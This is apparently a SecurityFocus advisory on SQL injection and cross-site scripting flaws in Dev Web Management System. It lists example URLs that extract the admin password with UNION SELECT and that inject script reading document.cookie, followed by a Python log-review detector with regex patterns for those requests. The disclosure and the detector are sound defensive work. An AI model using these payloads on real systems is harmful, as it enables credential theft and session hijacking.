
Dev Web Management System Multiple Input Validation Vulnerabilities

An exploit is not required.

The following examples were provided:

http://example.com/[path]/index.php?session=0&action=openforum&cat=-1%20UNION%20SELECT%20value,value,value%20FROM%20variables1%20WHERE%20name=CHAR(97,100,109,105,110,95,112,97,115,115,119,111,114,100)

http://example.com/[path]/getfile.php?cat=%%'UNION%20SELECT%20value,value%20FROM%20variables1%20%20WHERE%20name='admin_password'/*

http://example.com/[path]/download_now.php?target=9999999999999[SQL]

http://example.com/[path]/add.php?language[ENTER_ARTICLE_TITLE]=");}}--></script><script>alert(document.cookie)</script>

http://example.com/[path]/add.php?language[SPECIFY_ZONE]=");}}--></script><script>alert(document.cookie)</script>

http://example.com/[path]/add.php?language[ENTER_ARTICLE_HEADER]=");}}--></script><script>alert(document.cookie)</script>

http://example.com/[path]/add.php?language[ENTER_ARTICLE_BODY]=");}}--></script><script>alert(document.cookie)</script>
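
For log review, the request shapes listed above can be flagged by parameter name and value type. The following is an added example, not part of the original advisory or the product's code; it assumes that `cat` and `target` are short integer ids in legitimate traffic and that legitimate clients never send `language[...]` on the query string. The `/dwms` path and the sample requests are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: "cat" and "target" carry short integer ids in legitimate requests.
INTEGER_PARAMS = {"cat", "target"}
# The advisory's add.php examples all pass a language[...] array on the query string.
ARRAY_OVERRIDE = re.compile(r"^language\[[^\]]*\]$")
SQL_HINT = re.compile(r"\bunion\b[\s\S]*\bselect\b|\bchar\s*\(|/\*", re.I)
MARKUP_HINT = re.compile(r"[<>\"]")


def findings_for(request_target):
    """Return a sorted list of finding labels for one logged request target."""
    found = set()
    parts = urlsplit(request_target)
    script = parts.path.rsplit("/", 1)[-1]
    # parse_qsl percent-decodes names and values before they are checked.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in INTEGER_PARAMS and not re.fullmatch(r"\d{1,10}", value):
            found.add(f"{script}:{name}:bad-id")
            if SQL_HINT.search(value):
                found.add(f"{script}:{name}:sql-syntax")
        if ARRAY_OVERRIDE.match(name):
            found.add(f"{script}:language[]:set-from-query")
            if MARKUP_HINT.search(value):
                found.add(f"{script}:language[]:markup")
    return sorted(found)


# Constructed sample request targets (not real traffic); "/dwms" is a placeholder.
SAMPLE_REQUESTS = [
    "/dwms/index.php?session=0&action=openforum&cat=3",
    "/dwms/index.php?session=0&action=openforum"
    "&cat=-1%20UNION%20SELECT%20value,value,value%20FROM%20variables1",
    "/dwms/getfile.php?cat=%%'UNION%20SELECT%20value,value%20FROM%20variables1/*",
    "/dwms/download_now.php?target=9999999999999",
    "/dwms/add.php?language[ENTER_ARTICLE_TITLE]=%22)%3B}}--%3E%3C/script%3E",
    "/dwms/add.php?zone=2",
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(req, "->", findings_for(req) or "clean")
```

The `bad-id` label fires on any value that is not one to ten digits, so it also covers the oversized `target` value without relying on SQL keywords.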







 

Copyright 2008, SecurityFocus